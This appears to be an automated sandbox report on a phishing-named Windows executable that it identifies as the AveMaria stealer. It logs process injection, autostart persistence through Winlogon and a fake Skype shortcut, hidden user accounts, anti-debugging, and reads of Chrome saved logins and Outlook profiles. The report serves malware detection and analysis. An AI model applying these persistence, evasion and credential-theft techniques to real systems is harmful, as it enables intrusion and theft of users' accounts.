        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exeVirustotal: Detection: 31%
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\user\Desktop\hesaphareketi-01.exeJump to behavior
        Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe 'C:\Users\user\Desktop\hesaphareketi-01.exe'
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@7/7@2/2
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042094E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,17_3_042094E0
        Source: hesaphareketi-01.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: hesaphareketi-01.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: hesaphareketi-01.exe, 00000011.00000003.383843457.0000000003FE1000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: hesaphareketi-01.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: hesaphareketi-01.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: hesaphareketi-01.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: hesaphareketi-01.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04208C40 GetLastError,GetVersionExW,FormatMessageW,FormatMessageA,_free,LocalFree,_free,17_3_04208C40
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: hesaphareketi-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: hesaphareketi-01.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe, 00000011.00000003.383843457.0000000003FE1000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD902F push esi; retf 0_2_00DD9030
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD9206 push esp; retf 0_2_00DD9210
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD923A push esp; retf 0_2_00DD923B
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD931C push ebx; retf 0_2_00DD932E
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00DD8C4A push 8B000002h; retf 0_2_00DD8C4F
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04268D05 push ecx; ret 17_3_04268D18
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0426981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,17_3_0426981B
        Source: hesaphareketi-01.exeStatic PE information: 0x8A1682B9 [Mon Jun 1 00:24:25 2043 UTC]
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exeJump to dropped file
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to dropped file

        Boot Survival:

        barindex
        Creates an undocumented autostart registry key Show sources
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe\:Zone.Identifier:$DATAJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Contains functionality to hide user accountsShow sources
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Source: hesaphareketi-01.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: hesaphareketi-01.exe, 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile opened: C:\Users\user\Desktop\:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2256Thread sleep count: 1144 > 30Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2256Thread sleep count: 34 > 30Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2256Thread sleep time: -34000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 6220Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 6784Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe TID: 6564Thread sleep count: 60 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042097E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0420983Bh17_3_042097E0
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeWindow / User API: threadDelayed 1144Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04209970 GetSystemInfo,17_3_04209970
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04265FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_3_04265FCC
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_0426981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,17_3_0426981B
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04265FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_3_04265FCC

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 414000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 419000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 54F000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 552000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 553000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: A8F008Jump to behavior
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 400000 protect: page execute and read and writeJump to behavior
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJump to behavior
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042097E0 GetSystemTime,GetCurrentProcessId,GetTickCount,QueryPerformanceCounter,17_3_042097E0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042094E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,17_3_042094E0

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Increases the number of concurrent connection per server for Internet ExplorerShow sources
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375283442.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375468406.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file access)Show sources
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 1700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 6512, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375283442.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375468406.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224C20 sqlite3_bind_int,17_3_04224C20
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224C40 sqlite3_bind_int64,17_3_04224C40
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224CF0 sqlite3_bind_text,17_3_04224CF0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224CC0 sqlite3_bind_null,17_3_04224CC0
